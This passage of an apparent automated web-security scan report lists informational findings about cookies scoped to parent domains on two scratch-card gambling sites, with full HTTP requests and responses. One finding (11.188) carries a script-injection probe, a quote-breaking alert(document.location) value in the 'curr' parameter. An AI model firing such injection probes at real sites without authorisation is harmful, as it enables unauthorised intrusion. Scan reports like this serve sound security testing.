<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.181. http://www.primescratchcards.com/Responsible.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/Responsible.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

11.182. http://www.primescratchcards.com/SecurityAndPrivacy.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/SecurityAndPrivacy.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20508
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.183. http://www.primescratchcards.com/aboutus.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/aboutus.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21887
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.184. http://www.primescratchcards.com/affiliates.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/affiliates.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23594
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.185. http://www.primescratchcards.com/contactus.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/contactus.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25485
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.186. http://www.primescratchcards.com/fairplay.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/fairplay.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22256
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.187. http://www.primescratchcards.com/help.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/help.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20735
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.188. http://www.primescratchcards.com/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/index.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/
pscref=http%3A%2F%2Fwww%2Eprimescratchcards%2Ecom%2Findex%2Easp%3Fcurr%3DUSD35af5%2527%253balert%28document%2Elocation%29%2F%2Fd13433ff10e%26g%3D3; expires=Thu, 10-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3 HTTP/1.1
Host: www.primescratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3
Cookie: ARC=130137; pscref=; __utma=24585211.1553229019.1305549846.1305549846.1305549846.1; __utmb=24585211.1.10.1305549846; __utmc=24585211; __utmz=24585211.1305549846.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; plstat=0

Response

11.189. http://www.primescratchcards.com/media.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/media.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

11.190. http://www.primescratchcards.com/playersclub.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/playersclub.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25777
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.191. http://www.primescratchcards.com/promotions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/promotions.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21865
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.192. http://www.primescratchcards.com/terms.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/terms.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57383
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.193. http://www.primescratchcards.com/underage.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/underage.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20362
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.194. http://www.primescratchcards.com.br/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com.br
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=140053; expires=Tue, 15-May-2012 11:46:50 GMT; domain=.primescratchcards.com.br; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.primescratchcards.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.195. http://www.scratch2cash.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_1=EncryptedUniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 11:42:49 GMT; path=/
UniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.scratch2cash.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:42:49 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ot1ghj45nru51srozltshq55; path=/; HttpOnly
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 11:42:49 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: UniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Vary: Accept-Encoding
Content-Length: 43974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.196. http://www.scratch2cash.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.197. http://www.scratch2cash.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.198. http://www.scratch2cash.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
